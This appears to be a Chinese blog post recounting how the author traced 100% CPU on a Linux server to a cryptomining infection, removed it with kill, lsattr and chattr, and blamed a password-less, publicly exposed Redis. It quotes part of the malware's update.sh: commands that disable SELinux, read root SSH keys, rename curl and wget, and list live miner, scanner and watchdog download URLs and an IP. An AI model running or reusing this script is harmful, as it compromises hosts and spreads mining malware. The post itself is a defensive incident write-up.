linux cpu100%占用排查解决

文章主目录

• 挖矿病毒

回到顶部

挖矿病毒

排查

今天上线发现linux cpu飙升到100%

输入top -c 命令找到最号cpu的进程

top -c

 

 

 2.使用 kill -9后  几秒会后 又起起来了

3.输入命令

ls -l /proc/{pid号}/exe

 

 

 4. 我们进入etc目录下面看看

 5.发现里面有个update.sh脚本文件 打开看看

etenforce 0 2>dev/null
echo SELINUX=disabled > /etc/sysconfig/selinux 2>/dev/null
sync && echo 3 >/proc/sys/vm/drop_caches
crondir='/var/spool/cron/'"$USER"
cont=`cat ${crondir}`
ssht=`cat /root/.ssh/authorized_keys`
echo 1 > /etc/sysupdates
rtdir="/etc/sysupdates"
bbdir="/usr/bin/curl"
bbdira="/usr/bin/cur"
ccdir="/usr/bin/wget"
ccdira="/usr/bin/wge"
mv /usr/bin/wget /usr/bin/get
mv /usr/bin/xget /usr/bin/get
mv /usr/bin/get /usr/bin/wge
mv /usr/bin/curl /usr/bin/url
mv /usr/bin/xurl /usr/bin/url
mv /usr/bin/url /usr/bin/cur
miner_url="https://de.gsearch.com.de/api/sysupdate"
miner_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysupdate"
miner_size="1102480"
sh_url="https://de.gsearch.com.de/api/update.sh"
sh_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/update.sh"
config_url="https://de.gsearch.com.de/api/config.json"
config_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/config.json"
config_size="3356"
scan_url="https://de.gsearch.com.de/api/networkservice"
scan_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/networkservice"
scan_size="2584072"
watchdog_url="https://de.gsearch.com.de/api/sysguard"
watchdog_url_backup="http://185.181.10.234/E5DB0E07C3D7BE80V520/sysguard"
watchdog_size="1929480"

kill_miner_proc()
{
    ps auxf|grep kinsing| awk '{print $2}'|xargs kill -9
    ps auxf|grep kdevtmpfsi| awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "mine.moneropool.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "pool.t00ls.ru"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:8080"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:3333"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "zhuabcn@yahoo.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "monerohash.com"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "/tmp/a7b104c270"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:6666"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:7777"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmr.crypto-pool.fr:443"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "stratum.f2pool.com:8888"|awk '{print $2}'|xargs kill -9
    ps auxf|grep -v grep|grep "xmrpool.eu" | awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoyao| awk '{print $2}'|xargs kill -9
    ps auxf|grep xiaoxue| awk '{print $2}'|xargs kill -9
    ps ax|grep var|grep lib|grep jenkins|grep -v httpPort|grep -v headless|grep "\-c"|xargs kill -9
    ps ax|grep -o './[0-9]* -c'| xargs pkill -f
        ps aux | grep -v grep | grep 'kdevtmpfsi' | awk '{print $2}' | xargs -I % kill -9 %
        ps aux | grep -v grep | grep 'kinsing' | awk '{print $2}' | xargs -I % kill -9 %
        ps aux | grep -v grep | grep 'redis2' | awk '{print $2}' | xargs -I % kill -9 %
    pkill -f biosetjenkins
    pkill -f Loopback
"update.sh" [readonly] 961L, 37659C

6.看不懂 试着在百度搜了一下这个地址

https://de.gsearch.com.de/api/sysupdate

 

6.确定这个就是那个自启动挖矿脚本 删除

rm -rf  update.sh

 

 tmd发现没权限删除

7.使用lsattr chattr2个命令

lsattr update.sh # 发现有 i 所以要干掉i才能删除
chattr -i update.sh
rm -rf update.sh # 删除成功

8.杀掉进程

kill -9 13586

9.同样的步骤 删除networkservie

 

分析如何中毒的

1.安装了redis打开了端口外网访问。但是并没有设置密码

2.top找到redis进程和安装目录

 

 

cd /proc/5913
ll

 

 

设置密码可参考

https://blog.csdn.net/qq_26440803/article/details/82967433 

3.关闭端口任意机器可访问 限制指定机器ip

第二次杀毒

以为昨晚上面这些以为就万事大吉 结果没一会儿又出现了 参考博文:https://www.cnblogs.com/brishenzhou/p/11770478.html